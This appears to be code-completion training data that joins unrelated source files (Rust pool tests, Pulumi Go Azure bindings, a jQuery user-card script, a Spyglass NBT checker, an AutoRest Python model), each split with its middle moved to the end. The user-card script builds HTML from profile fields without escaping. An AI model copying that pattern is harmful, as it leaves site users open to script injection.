let pool = Pool::builder()
.connection_timeout(Duration::from_secs(1))
.build_unchecked(manager);
let err = pool.get().err().unwrap();
assert!(err.to_string().contains("blammo"));
}
#[test]
fn test_get_timeout() {
let pool = Pool::builder()
.max_size(1)
.connection_timeout(Duration::from_secs(1))
.build(OkManager)
.unwrap();
let _c = pool.get().unwrap();
pool.get().err().unwrap();
}
#[test]
fn test_connection_customizer() {
static RELEASED: AtomicBool = ATOMIC_BOOL_INIT;
RELEASED.store(false, Ordering::SeqCst);
static DROPPED: AtomicBool = ATOMIC_BOOL_INIT;
DROPPED.store(false, Ordering::SeqCst);
struct Connection(i32);
impl Drop for Connection {
fn drop(&mut self) {
DROPPED.store(true, Ordering::SeqCst);
}
}
struct Handler;
impl ManageConnection for Handler {
type Connection = Connection;
type Error = Error;
fn connect(&self) -> Result<Connection, Error> {
Ok(Connection(0))
}
fn is_valid(&self, _: &mut Connection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut Connection) -> bool {
true
}
}
#[derive(Debug)]
struct Customizer;
impl CustomizeConnection<Connection, Error> for Customizer {
fn on_acquire(&self, conn: &mut Connection) -> Result<(), Error> {
if !DROPPED.load(Ordering::SeqCst) {
Err(Error)
} else {
conn.0 = 1;
Ok(())
}
}
fn on_release(&self, _: Connection) {
RELEASED.store(true, Ordering::SeqCst);
}
}
let pool = Pool::builder()
.connection_customizer(Box::new(Customizer))
.build(Handler)
.unwrap();
{
let conn = pool.get().unwrap();
assert_eq!(1, conn.0);
assert!(!RELEASED.load(Ordering::SeqCst));
assert!(DROPPED.load(Ordering::SeqCst));
}
assert!(RELEASED.load(Ordering::SeqCst));
}
#[test]
fn test_idle_timeout() {
static DROPPED: AtomicUsize = ATOMIC_USIZE_INIT;
struct Connection;
impl Drop for Connection {
fn drop(&mut self) {
DROPPED.fetch_add(1, Ordering::SeqCst);
}
}
struct Handler(AtomicIsize);
impl ManageConnection for Handler {
type Connection = Connection;
type Error = Error;
fn connect(&self) -> Result<Connection, Error> {
if self.0.fetch_sub(1, Ordering::SeqCst) > 0 {
Ok(Connection)
} else {
Err(Error)
}
}
fn is_valid(&self, _: &mut Connection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut Connection) -> bool {
false
}
}
let pool = Pool::builder()
.max_size(5)
.idle_timeout(Some(Duration::from_secs(1)))
.reaper_rate(Duration::from_secs(1))
.build(Handler(AtomicIsize::new(5)))
.unwrap();
let conn = pool.get().unwrap();
thread::sleep(Duration::from_secs(2));
assert_eq!(4, DROPPED.load(Ordering::SeqCst));
drop(conn);
assert_eq!(4, DROPPED.load(Ordering::SeqCst));
}
#[test]
fn idle_timeout_partial_use() {
static DROPPED: AtomicUsize = ATOMIC_USIZE_INIT;
struct Connection;
impl Drop for Connection {
fn drop(&mut self) {
DROPPED.fetch_add(1, Ordering::SeqCst);
}
}
struct Handler(AtomicIsize);
impl ManageConnection for Handler {
type Connection = Connection;
type Error = Error;
fn connect(&self) -> Result<Connection, Error> {
if self.0.fetch_sub(1, Ordering::SeqCst) > 0 {
Ok(Connection)
} else {
Err(Error)
}
}
fn is_valid(&self, _: &mut Connection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut Connection) -> bool {
false
}
}
let pool = Pool::builder()
.max_size(5)
.idle_timeout(Some(Duration::from_secs(1)))
.reaper_rate(Duration::from_secs(1))
.build(Handler(AtomicIsize::new(5)))
.unwrap();
for _ in 0..8 {
thread::sleep(Duration::from_millis(250));
pool.get().unwrap();
}
assert_eq!(4, DROPPED.load(Ordering::SeqCst));
assert_eq!(1, pool.state().connections);
}
#[test]
fn test_max_lifetime() {
static DROPPED: AtomicUsize = ATOMIC_USIZE_INIT;
struct Connection;
impl Drop for Connection {
fn drop(&mut self) {
DROPPED.fetch_add(1, Ordering::SeqCst);
}
}
struct Handler(AtomicIsize);
impl ManageConnection for Handler {
type Connection = Connection;
type Error = Error;
fn connect(&self) -> Result<Connection, Error> {
if self.0.fetch_sub(1, Ordering::SeqCst) > 0 {
Ok(Connection)
} else {
Err(Error)
}
}
fn is_valid(&self, _: &mut Connection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut Connection) -> bool {
false
}
}
let pool = Pool::builder()
.max_size(5)
.max_lifetime(Some(Duration::from_secs(1)))
.connection_timeout(Duration::from_secs(1))
.reaper_rate(Duration::from_secs(1))
.build(Handler(AtomicIsize::new(5)))
.unwrap();
let conn = pool.get().unwrap();
thread::sleep(Duration::from_secs(2));
assert_eq!(4, DROPPED.load(Ordering::SeqCst));
drop(conn);
thread::sleep(Duration::from_secs(2));
assert_eq!(5, DROPPED.load(Ordering::SeqCst));
assert!(pool.get().is_err());
}
#[test]
fn min_idle() {
struct Connection;
struct Handler;
impl ManageConnection for Handler {
type Connection = Connection;
type Error = Error;
fn connect(&self) -> Result<Connection, Error> {
Ok(Connection)
}
fn is_valid(&self, _: &mut Connection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut Connection) -> bool {
false
}
}
let pool = Pool::builder()
.max_size(5)
.min_idle(Some(2))
.build(Handler)
.unwrap();
thread::sleep(Duration::from_secs(1));
assert_eq!(2, pool.state().idle_connections);
assert_eq!(2, pool.state().connections);
let conns = (0..3).map(|_| pool.get().unwrap()).collect::<Vec<_>>(); | thread::sleep(Duration::from_secs(1));
assert_eq!(2, pool.state().idle_connections);
assert_eq!(5, pool.state().connections);
mem::drop(conns);
assert_eq!(5, pool.state().idle_connections);
assert_eq!(5, pool.state().connections);
}
#[test]
fn conns_drop_on_pool_drop() {
static DROPPED: AtomicUsize = ATOMIC_USIZE_INIT;
struct Connection;
impl Drop for Connection {
fn drop(&mut self) {
DROPPED.fetch_add(1, Ordering::SeqCst);
}
}
struct Handler;
impl ManageConnection for Handler {
type Connection = Connection;
type Error = Error;
fn connect(&self) -> Result<Connection, Error> {
Ok(Connection)
}
fn is_valid(&self, _: &mut Connection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut Connection) -> bool {
false
}
}
let pool = Pool::builder()
.max_lifetime(Some(Duration::from_secs(10)))
.max_size(10)
.build(Handler)
.unwrap();
drop(pool);
for _ in 0..10 {
if DROPPED.load(Ordering::SeqCst) == 10 {
return;
}
thread::sleep(Duration::from_secs(1));
}
panic!("timed out waiting for connections to drop");
} | |
virtualNetwork.go | // *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
// *** Do not edit by hand unless you're certain you know what you are doing! ***
package network
import (
"reflect"
"github.com/pkg/errors"
"github.com/pulumi/pulumi/sdk/v2/go/pulumi"
)
// Manages a virtual network including any configured subnets. Each subnet can
// optionally be configured with a security group to be associated with the subnet.
//
// > **NOTE on Virtual Networks and Subnet's:** This provider currently
// provides both a standalone Subnet resource, and allows for Subnets to be defined in-line within the Virtual Network resource.
// At this time you cannot use a Virtual Network with in-line Subnets in conjunction with any Subnet resources. Doing so will cause a conflict of Subnet configurations and will overwrite Subnet's.
type VirtualNetwork struct {
pulumi.CustomResourceState
// The address space that is used the virtual
// network. You can supply more than one address space. Changing this forces
// a new resource to be created.
AddressSpaces pulumi.StringArrayOutput `pulumi:"addressSpaces"`
// A `ddosProtectionPlan` block as documented below.
DdosProtectionPlan VirtualNetworkDdosProtectionPlanPtrOutput `pulumi:"ddosProtectionPlan"`
// List of IP addresses of DNS servers
DnsServers pulumi.StringArrayOutput `pulumi:"dnsServers"`
// The GUID of the virtual network.
Guid pulumi.StringOutput `pulumi:"guid"`
// The location/region where the virtual network is
// created. Changing this forces a new resource to be created.
Location pulumi.StringOutput `pulumi:"location"`
// The name of the virtual network. Changing this forces a
// new resource to be created.
Name pulumi.StringOutput `pulumi:"name"`
// The name of the resource group in which to
// create the virtual network.
ResourceGroupName pulumi.StringOutput `pulumi:"resourceGroupName"`
// Can be specified multiple times to define multiple
// subnets. Each `subnet` block supports fields documented below.
Subnets VirtualNetworkSubnetArrayOutput `pulumi:"subnets"`
// A mapping of tags to assign to the resource.
Tags pulumi.StringMapOutput `pulumi:"tags"`
}
// NewVirtualNetwork registers a new resource with the given unique name, arguments, and options.
func NewVirtualNetwork(ctx *pulumi.Context,
name string, args *VirtualNetworkArgs, opts ...pulumi.ResourceOption) (*VirtualNetwork, error) {
if args == nil || args.AddressSpaces == nil {
return nil, errors.New("missing required argument 'AddressSpaces'")
}
if args == nil || args.ResourceGroupName == nil {
return nil, errors.New("missing required argument 'ResourceGroupName'")
}
if args == nil {
args = &VirtualNetworkArgs{}
}
var resource VirtualNetwork
err := ctx.RegisterResource("azure:network/virtualNetwork:VirtualNetwork", name, args, &resource, opts...)
if err != nil {
return nil, err
}
return &resource, nil
}
// GetVirtualNetwork gets an existing VirtualNetwork resource's state with the given name, ID, and optional
// state properties that are used to uniquely qualify the lookup (nil if not required).
func GetVirtualNetwork(ctx *pulumi.Context,
name string, id pulumi.IDInput, state *VirtualNetworkState, opts ...pulumi.ResourceOption) (*VirtualNetwork, error) {
var resource VirtualNetwork
err := ctx.ReadResource("azure:network/virtualNetwork:VirtualNetwork", name, id, state, &resource, opts...)
if err != nil |
return &resource, nil
}
// Input properties used for looking up and filtering VirtualNetwork resources.
type virtualNetworkState struct {
// The address space that is used the virtual
// network. You can supply more than one address space. Changing this forces
// a new resource to be created.
AddressSpaces []string `pulumi:"addressSpaces"`
// A `ddosProtectionPlan` block as documented below.
DdosProtectionPlan *VirtualNetworkDdosProtectionPlan `pulumi:"ddosProtectionPlan"`
// List of IP addresses of DNS servers
DnsServers []string `pulumi:"dnsServers"`
// The GUID of the virtual network.
Guid *string `pulumi:"guid"`
// The location/region where the virtual network is
// created. Changing this forces a new resource to be created.
Location *string `pulumi:"location"`
// The name of the virtual network. Changing this forces a
// new resource to be created.
Name *string `pulumi:"name"`
// The name of the resource group in which to
// create the virtual network.
ResourceGroupName *string `pulumi:"resourceGroupName"`
// Can be specified multiple times to define multiple
// subnets. Each `subnet` block supports fields documented below.
Subnets []VirtualNetworkSubnet `pulumi:"subnets"`
// A mapping of tags to assign to the resource.
Tags map[string]string `pulumi:"tags"`
}
type VirtualNetworkState struct {
// The address space that is used the virtual
// network. You can supply more than one address space. Changing this forces
// a new resource to be created.
AddressSpaces pulumi.StringArrayInput
// A `ddosProtectionPlan` block as documented below.
DdosProtectionPlan VirtualNetworkDdosProtectionPlanPtrInput
// List of IP addresses of DNS servers
DnsServers pulumi.StringArrayInput
// The GUID of the virtual network.
Guid pulumi.StringPtrInput
// The location/region where the virtual network is
// created. Changing this forces a new resource to be created.
Location pulumi.StringPtrInput
// The name of the virtual network. Changing this forces a
// new resource to be created.
Name pulumi.StringPtrInput
// The name of the resource group in which to
// create the virtual network.
ResourceGroupName pulumi.StringPtrInput
// Can be specified multiple times to define multiple
// subnets. Each `subnet` block supports fields documented below.
Subnets VirtualNetworkSubnetArrayInput
// A mapping of tags to assign to the resource.
Tags pulumi.StringMapInput
}
func (VirtualNetworkState) ElementType() reflect.Type {
return reflect.TypeOf((*virtualNetworkState)(nil)).Elem()
}
type virtualNetworkArgs struct {
// The address space that is used the virtual
// network. You can supply more than one address space. Changing this forces
// a new resource to be created.
AddressSpaces []string `pulumi:"addressSpaces"`
// A `ddosProtectionPlan` block as documented below.
DdosProtectionPlan *VirtualNetworkDdosProtectionPlan `pulumi:"ddosProtectionPlan"`
// List of IP addresses of DNS servers
DnsServers []string `pulumi:"dnsServers"`
// The location/region where the virtual network is
// created. Changing this forces a new resource to be created.
Location *string `pulumi:"location"`
// The name of the virtual network. Changing this forces a
// new resource to be created.
Name *string `pulumi:"name"`
// The name of the resource group in which to
// create the virtual network.
ResourceGroupName string `pulumi:"resourceGroupName"`
// Can be specified multiple times to define multiple
// subnets. Each `subnet` block supports fields documented below.
Subnets []VirtualNetworkSubnet `pulumi:"subnets"`
// A mapping of tags to assign to the resource.
Tags map[string]string `pulumi:"tags"`
}
// The set of arguments for constructing a VirtualNetwork resource.
type VirtualNetworkArgs struct {
// The address space that is used the virtual
// network. You can supply more than one address space. Changing this forces
// a new resource to be created.
AddressSpaces pulumi.StringArrayInput
// A `ddosProtectionPlan` block as documented below.
DdosProtectionPlan VirtualNetworkDdosProtectionPlanPtrInput
// List of IP addresses of DNS servers
DnsServers pulumi.StringArrayInput
// The location/region where the virtual network is
// created. Changing this forces a new resource to be created.
Location pulumi.StringPtrInput
// The name of the virtual network. Changing this forces a
// new resource to be created.
Name pulumi.StringPtrInput
// The name of the resource group in which to
// create the virtual network.
ResourceGroupName pulumi.StringInput
// Can be specified multiple times to define multiple
// subnets. Each `subnet` block supports fields documented below.
Subnets VirtualNetworkSubnetArrayInput
// A mapping of tags to assign to the resource.
Tags pulumi.StringMapInput
}
func (VirtualNetworkArgs) ElementType() reflect.Type {
return reflect.TypeOf((*virtualNetworkArgs)(nil)).Elem()
}
| {
return nil, err
} |
com.ucard.js | /**
* 绑定用户小名片
*/
function ucard() {
| card]').qtip({ // Grab some elements to apply the tooltip to
suppress: true,
content: {
text: function (event, api) {
var uid = $(this).attr('ucard');
$.get(U('Ucenter/Public/getProfile'), {uid: uid}, function (userProfile) {
var follow = '';
if ((MID != uid) && (MID != 0)) {
follow = '<button type="button" class="btn btn-default" onclick="talker.start_talk(\'' + userProfile.uid + '\')" style="float: right;margin: 5px 0;padding: 2px 12px;margin-left: 8px;">聊 天</button>';
if (userProfile.followed == 1) {
follow += '<button type="button" class="btn btn-default" onclick="ufollow(this,\'' + userProfile.uid + '\')" style="float: right;margin: 5px 0;padding: 2px 12px;"><font title="取消关注">已关注</font></button>';
} else {
follow += '<button type="button" class="btn btn-primary" onclick="ufollow(this,\'' + userProfile.uid + '\')" style="float: right;margin: 5px 0;padding: 2px 12px;">关 注</button>';
}
}
var html = '<div class="row" style="width: 350px;width: 350px;font-size: 13px;line-height: 23px;">' +
'<div class="col-xs-12" style="padding: 2px;">' +
'<img class="img-responsive" src="' + window.Think.ROOT + '/Public/images/qtip_bg.png">' +
'</div>' +
'<div class="col-xs-12" style="padding: 2px;margin-top: -25px;">' +
'<div class="col-xs-3">' +
'<img src="{$userProfile.avatar64}" class="avatar-img img-responsive" style=""/>' +
'</div>' +
'<div class="col-xs-9" style="padding-top: 25px;padding-right:0px;font-size: 12px;">' +
'<div style="font-size: 16px;font-weight: bold;"><a href="{$userProfile.space_url}" title="">{$userProfile.nickname}</a>{$userProfile.rank_link}' +
'</div>' +
'<div>' +
'<a href="{$userProfile.following_url}" title="关注数" target="_black">关注:{$userProfile.following}</a> ' +
'<a href="{$userProfile.fans_url}" title="粉丝数" target="_black">粉丝:{$userProfile.fans}</a> ' +
'</div>' +
'<div style="margin-bottom: 15px;color: #848484">' +
'个性签名:' +
'<span>' +
'{$userProfile.signature}' +
'</span>' +
'</div>' +
'</div>' +
'</div>' +
'<div class="col-xs-12" style="background: #f1f1f1;">' +
follow +
'</div>' +
'</div>';
userProfile.signature = userProfile.signature === '' ? '还没想好O(∩_∩)O' : userProfile.signature;
for (var key in userProfile) {
html = html.replace('{$userProfile.' + key + '}', userProfile[key]);
}
//alert(html);
var tpl = $(html);
api.set('content.text', tpl.html());
}, 'json');
return '获取数据中...'
}
}, position: {
viewport: $(window)
}, show: {
solo: true,
delay: 500
}, style: {
classes: 'qtip-bootstrap'
}, hide: {
delay: 500, fixed: true
}
})
} | $('[u |
index.ts | import * as core from '@spyglassmc/core'
import { localeQuote, localize } from '@spyglassmc/locales'
import * as mcdoc from '@spyglassmc/mcdoc'
import type { NbtByteNode, NbtCompoundNode, NbtNode, NbtNumberNode, NbtPathNode, NbtPrimitiveArrayNode, NbtPrimitiveNode } from '../node/index.js'
import { NbtListNode } from '../node/index.js'
import { localizeTag } from '../util.js'
import { getBlocksFromItem, getEntityFromItem, getSpecialStringParser } from './mcdocUtil.js'
interface Options {
allowUnknownKey?: boolean,
isPredicate?: boolean,
}
interface PathOptions {
allowUnknownKey?: boolean,
}
declare global {
// https://github.com/microsoft/TypeScript/issues/17002#issuecomment-536946686
interface ArrayConstructor {
isArray(arg: unknown): arg is unknown[] | readonly unknown[]
}
}
/**
* @param id If the registry is under the `custom` namespace, `id` can only be a string. Otherwise it can be a string, string array, or `undefined`.
* If set to `undefined` or an empty array, all mcdoc compound definitions for this registry will be merged for checking, and unknown keys are allowed.
*/
export function index(registry: string, id: core.FullResourceLocation | readonly core.FullResourceLocation[] | undefined, options?: Options): core.SyncChecker<NbtCompoundNode>
export function index(registry: string, id: core.FullResourceLocation, options?: Options): core.SyncChecker<NbtCompoundNode>
export function index(registry: string, id: core.FullResourceLocation | readonly core.FullResourceLocation[] | undefined, options: Options = {}): core.SyncChecker<NbtCompoundNode> {
switch (registry) {
case 'custom:blockitemstates':
const blockIds = getBlocksFromItem(id as core.FullResourceLocation)
return blockIds
? blockStates(blockIds, options)
: core.checker.noop
case 'custom:blockstates':
return blockStates([id as string], options)
case 'custom:spawnitemtag':
const entityId = getEntityFromItem(id as core.FullResourceLocation)
return entityId
? index('entity_type', entityId, options)
: core.checker.noop
default:
return (node, ctx) => {
// const { allowUnknownKey, value } = resolveRootRegistry(registry, id, ctx, node)
// options.allowUnknownKey ||= allowUnknownKey
// compound(value, options)(node, ctx)
}
}
}
/**
* @param identifier An identifier of mcdoc compound definition. e.g. `::minecraft::util::invitem::InventoryItem`
*/
export function definition(identifier: `::${string}::${string}`, options: Options = {}): core.SyncChecker<NbtCompoundNode> {
const index = identifier.lastIndexOf('::')
const module = identifier.slice(0, index)
const compoundDef = identifier.slice(index + 2)
const path: core.SymbolPath = { category: 'mcdoc', path: [module, compoundDef] }
return (node, ctx) => {
// const { allowUnknownKey, value } = resolveSymbolPaths([path], ctx, node)
// options.allowUnknownKey ||= allowUnknownKey
// compound(value, options)(node, ctx)
}
}
export function blockStates(blocks: string[], _options: Options = {}): core.SyncChecker<NbtCompoundNode> {
return (node, ctx) => {
const states = core.getStates('block', blocks, ctx)
for (const { key: keyNode, value: valueNode } of node.children) {
if (!keyNode || !valueNode) {
continue
}
// Type check.
if (valueNode.type === 'nbt:byte' && (ctx.src.slice(valueNode.range).toLowerCase() === 'false' || ctx.src.slice(valueNode.range).toLowerCase() === 'true')) {
ctx.err.report(localize('nbt.checker.block-states.fake-boolean'), valueNode, core.ErrorSeverity.Warning)
continue
} else if (valueNode.type !== 'string' && valueNode.type !== 'nbt:int') {
ctx.err.report(localize('nbt.checker.block-states.unexpected-value-type'), valueNode, core.ErrorSeverity.Warning)
continue
}
if (Object.keys(states).includes(keyNode.value)) {
// The current state exists. Check the value.
const stateValues = states[keyNode.value]!
if (!stateValues.includes(valueNode.value.toString())) {
ctx.err.report(localize('expected-got', stateValues, localeQuote(valueNode.value.toString())), valueNode, core.ErrorSeverity.Warning)
}
} else {
// The current state doesn't exist.
ctx.err.report(
localize('nbt.checker.block-states.unknown-state', localeQuote(keyNode.value), blocks),
keyNode, core.ErrorSeverity.Warning
)
}
}
}
}
/**
* @param path The {@link core.SymbolPath} to the compound definition.
*/
export function compound(data: any, options: Options = {}): core.SyncChecker<NbtCompoundNode> {
return (node, ctx) => {
for (const { key: keyNode, value: valueNode } of node.children) {
if (!keyNode || !valueNode) {
continue
}
const key = keyNode.value
const fieldData = data[key]
if (fieldData) {
fieldData.query.enter({ usage: { type: 'reference', node: keyNode } })
fieldValue(fieldData.data, options)(valueNode, ctx)
} else if (!options.allowUnknownKey) {
ctx.err.report(localize('unknown-key', localeQuote(key)), keyNode, core.ErrorSeverity.Warning)
}
}
}
}
export function | (path: core.SymbolPath | undefined, _options: Options = {}): core.SyncChecker<NbtPrimitiveNode> {
if (!path) {
return core.checker.noop
}
return (node, ctx) => {
// const query = ctx.symbols.query(ctx.doc, path.category, ...path.path)
// const data = query.symbol?.data as mcdoc.EnumNode.SymbolData | undefined
// // Check type.
// if (data?.enumKind && node.type !== data.enumKind && node.type !== `nbt:${data.enumKind}`) {
// ctx.err.report(localize('expected', localize(`nbt.node.${data.enumKind}`)), node, core.ErrorSeverity.Warning)
// }
// // Get all enum members.
// const enumMembers: Record<string, string> = {}
// query.forEachMember((name, memberQuery) => {
// const value = (memberQuery.symbol?.data as mcdoc.EnumFieldNode.SymbolData | undefined)?.value
// if (value !== undefined) {
// enumMembers[name] = value.toString()
// }
// })
// // Check value.
// if (!Object.values(enumMembers).includes(node.value.toString())) {
// ctx.err.report(localize('expected',
// Object.entries(enumMembers).map(([k, v]) => `${k} = ${v}`)
// ), node, core.ErrorSeverity.Warning)
// }
}
}
/**
* @param id If set to `undefined` or an empty array, all mcdoc compound definitions for this registry will be merged for checking, and unknown keys are allowed.
*/
export function path(registry: string, id: core.FullResourceLocation | readonly core.FullResourceLocation[] | undefined): core.SyncChecker<NbtPathNode> {
return (node, ctx) => {
// const resolveResult = resolveRootRegistry(registry, id, ctx, undefined)
// let targetType: mcdoc.McdocType | undefined = {
// kind: 'dispatcher',
// registry,
// index: ((): mcdoc.DispatcherData['index'] => {
// if (id === undefined) {
// return { kind: 'static', value: { keyword: '()' } }
// } else if (typeof id === 'string') {
// return { kind: 'static', value: id }
// } else {
// return id.map(v => ({ kind: 'static', value: v }))
// }
// })(),
// }
// const options: Options = { allowUnknownKey: resolveResult.allowUnknownKey, isPredicate: true }
// let currentCompound: NbtCompoundNode | undefined
// for (const child of node.children) {
// if (NbtCompoundNode.is(child)) {
// // Compound filter.
// currentCompound = child
// if (data?.type === 'union') {
// }
// if (data?.type === 'resolved_compound') {
// compound(data.data, options)(child, ctx)
// } else {
// ctx.err.report(localize('nbt.checker.path.unexpected-filter'), child, core.ErrorSeverity.Warning)
// }
// } else if (core.StringNode.is(child)) {
// // Key.
// if (data?.type === 'union') {
// }
// if (data?.type === 'resolved_compound') {
// const fieldData: ResolvedCompoundData[string] = data.data[child.value]
// if (fieldData) {
// fieldData.query.enter({ usage: { type: 'reference', node: child } })
// if (fieldData.data.type === 'byte_array' || fieldData.data.type === 'int_array' || fieldData.data.type === 'long_array' || fieldData.data.type === 'list' || fieldData.data.type === 'union') {
// data = fieldData.data
// } else {
// const resolveResult = resolveSymbolData(fieldData.data, ctx, currentCompound)
// if (resolveResult.value) {
// options.allowUnknownKey ||= resolveResult.allowUnknownKey
// data.data = resolveResult.value
// } else {
// data = undefined
// }
// }
// targetType = fieldData.data
// } else {
// if (!options.allowUnknownKey) {
// ctx.err.report(localize('unknown-key', localeQuote(child.value)), child, core.ErrorSeverity.Warning)
// }
// targetType = undefined
// break
// }
// } else {
// ctx.err.report(localize('nbt.checker.path.unexpected-key'), child, core.ErrorSeverity.Warning)
// targetType = undefined
// break
// }
// currentCompound = undefined
// } else {
// // Index.
// if (data?.type === 'byte_array' || data?.type === 'int_array' || data?.type === 'long_array' || data?.type === 'list') {
// // Check content.
// if (child.children !== undefined) {
// const [content] = child.children
// if (content.type === 'integer') {
// const absIndex = content.value < 0 ? -1 - content.value : content.value
// const [, maxLength] = data.lengthRange ?? [undefined, undefined]
// if (maxLength !== undefined && absIndex >= maxLength) {
// ctx.err.report(localize('nbt.checker.path.index-out-of-bound', content.value, maxLength), content, core.ErrorSeverity.Warning)
// }
// } else {
// let isUnexpectedFilter = true
// if (data.type === 'list') {
// const { allowUnknownKey, value } = resolveSymbolData(data.item, ctx, currentCompound)
// options.allowUnknownKey ||= allowUnknownKey
// if (value) {
// isUnexpectedFilter = false
// compound(value, options)(content, ctx)
// }
// }
// if (isUnexpectedFilter) {
// ctx.err.report(localize('nbt.checker.path.unexpected-filter'), content, core.ErrorSeverity.Warning)
// targetType = undefined
// break
// }
// currentCompound = content
// }
// }
// // Set data for the next iteration.
// if (data.type === 'list') {
// const { allowUnknownKey, value } = resolveSymbolData(data.item, ctx, currentCompound)
// options.allowUnknownKey ||= allowUnknownKey
// targetType = data.item
// if (value) {
// data = { type: 'resolved_compound', data: value }
// } else {
// data = undefined
// }
// } else {
// targetType = {
// type: data.type.split('_')[0] as 'byte' | 'int' | 'long',
// valueRange: data.valueRange,
// }
// data = undefined
// }
// } else {
// ctx.err.report(localize('nbt.checker.path.unexpected-index'), child, core.ErrorSeverity.Warning)
// targetType = undefined
// break
// }
// }
// }
// ctx.ops.set(node, 'targetType', targetType)
}
}
export function fieldValue(type: mcdoc.McdocType, options: Options): core.SyncChecker<NbtNode> {
const isInRange = (value: number, [min, max]: [number | undefined, number | undefined]) =>
(min ?? -Infinity) <= value && value <= (max ?? Infinity)
const ExpectedTypes: Record<Exclude<mcdoc.McdocType['kind'], 'any' | 'dispatcher' | 'enum' | 'literal' | 'reference' | 'union'>, NbtNode['type']> = {
boolean: 'nbt:byte',
byte: 'nbt:byte',
byte_array: 'nbt:byte_array',
double: 'nbt:double',
float: 'nbt:float',
int: 'nbt:int',
int_array: 'nbt:int_array',
list: 'nbt:list',
long: 'nbt:long',
long_array: 'nbt:long_array',
short: 'nbt:short',
string: 'string',
struct: 'nbt:compound',
tuple: 'nbt:list',
}
return (node, ctx): void => {
// Rough type check.
if (type.kind !== 'any' && type.kind !== 'dispatcher' && type.kind !== 'enum' && type.kind !== 'literal' && type.kind !== 'reference' && type.kind !== 'union' && node.type !== ExpectedTypes[type.kind]) {
ctx.err.report(localize('expected', localizeTag(ExpectedTypes[type.kind])), node, core.ErrorSeverity.Warning)
return
}
switch (type.kind) {
case 'boolean':
node = node as NbtByteNode
if (node.value !== 0 && node.value !== 1) {
ctx.err.report(
localize('nbt.checker.boolean.out-of-range', localeQuote('0b'), localeQuote('1b')),
node, core.ErrorSeverity.Warning
)
}
break
case 'byte_array':
case 'int_array':
case 'long_array':
node = node as NbtPrimitiveArrayNode
if (type.lengthRange && !isInRange(node.children.length, type.lengthRange)) {
ctx.err.report(localize('expected', localize('nbt.checker.collection.length-between',
localizeTag(node.type),
type.lengthRange[0] ?? '-∞',
type.lengthRange[1] ?? '+∞'
)), node, core.ErrorSeverity.Warning)
}
if (type.valueRange) {
for (const { value: childNode } of node.children) {
if (childNode && !isInRange(Number(childNode.value), type.valueRange)) {
ctx.err.report(localize('number.between',
type.valueRange[0] ?? '-∞',
type.valueRange[1] ?? '+∞'
), node, core.ErrorSeverity.Warning)
}
}
}
break
case 'byte':
case 'short':
case 'int':
case 'long':
case 'float':
case 'double':
node = node as NbtNumberNode
if (type.valueRange && !isInRange(Number(node.value), type.valueRange)) {
ctx.err.report(localize('number.between',
type.valueRange[0] ?? '-∞',
type.valueRange[1] ?? '+∞'
), node, core.ErrorSeverity.Warning)
}
break
case 'dispatcher':
node = node as NbtCompoundNode
// const id = resolveFieldPath(node.parent?.parent, type.index.path)
// if (type.index.registry) {
// if (ExtendableRootRegistry.is(type.index.registry)) {
// index(type.index.registry, id ? core.ResourceLocation.lengthen(id) : undefined, options)(node, ctx)
// } else if (id) {
// index(type.index.registry, core.ResourceLocation.lengthen(id), options)(node, ctx)
// }
// }
break
case 'list':
node = node as NbtListNode
type = mcdoc.simplifyListType(type)
if (type.lengthRange && !isInRange(node.children.length, type.lengthRange)) {
ctx.err.report(localize('expected', localize('nbt.checker.collection.length-between',
localizeTag(node.type),
type.lengthRange[0] ?? '-∞',
type.lengthRange[1] ?? '+∞'
)), node, core.ErrorSeverity.Warning)
}
for (const { value: childNode } of node.children) {
if (childNode) {
fieldValue(type.item, options)(childNode, ctx)
}
}
break
case 'string':
node = node as core.StringNode
let suffix = ''
let valueNode: NbtNode = node
if (core.ItemNode.is(node.parent) && NbtListNode.is(node.parent.parent)) {
suffix = '[]'
valueNode = node.parent.parent
}
if (core.PairNode.is<core.StringNode, NbtNode>(valueNode.parent)) {
const structMcdocPath = valueNode.parent.key?.symbol?.parentSymbol?.path.join('::')
const key = valueNode.parent.key?.value
const path = `${structMcdocPath}.${key}${suffix}`
const parserName = getSpecialStringParser(path)
if (parserName) {
try {
const parser = ctx.meta.getParser(parserName)
const result = core.parseStringValue(parser, node.value, node.valueMap, ctx)
if (result !== core.Failure) {
node.children = [result]
result.parent = node
}
} catch (e) {
ctx.logger.error('[nbt.checker.fieldValue#string]', e)
}
}
}
break
case 'reference':
node = node as NbtCompoundNode
// if (type.symbol) {
// const { allowUnknownKey, value } = resolveSymbolPaths([type.symbol], ctx, node)
// compound(value, { ...options, allowUnknownKey: options.allowUnknownKey || allowUnknownKey })(node, ctx)
// }
break
case 'union':
type = mcdoc.flattenUnionType(type)
if (type.members.length === 0) {
ctx.err.report(
localize('nbt.checker.compound.field.union-empty-members'),
core.PairNode.is(node.parent)
? (node.parent.key ?? node.parent)
: node,
core.ErrorSeverity.Warning
)
} else {
(core.checker.any(type.members.map(t => fieldValue(t, options))) as core.SyncChecker<NbtNode>)(node, ctx)
}
break
}
}
}
| enum_ |
deployment_properties_extended.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 0.17.0.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DeploymentPropertiesExtended(Model):
"""Deployment properties with additional details.
:param provisioning_state: Gets or sets the state of the provisioning.
:type provisioning_state: str
:param correlation_id: Gets or sets the correlation ID of the deployment.
:type correlation_id: str
:param timestamp: Gets or sets the timestamp of the template deployment.
:type timestamp: datetime
:param outputs: Gets or sets key/value pairs that represent
deploymentoutput.
:type outputs: object
:param providers: Gets the list of resource providers needed for the
deployment.
:type providers: list of :class:`Provider <Default.models.Provider>`
:param dependencies: Gets the list of deployment dependencies.
:type dependencies: list of :class:`Dependency
<Default.models.Dependency>`
:param template: Gets or sets the template content. Use only one of
Template or TemplateLink.
:type template: object
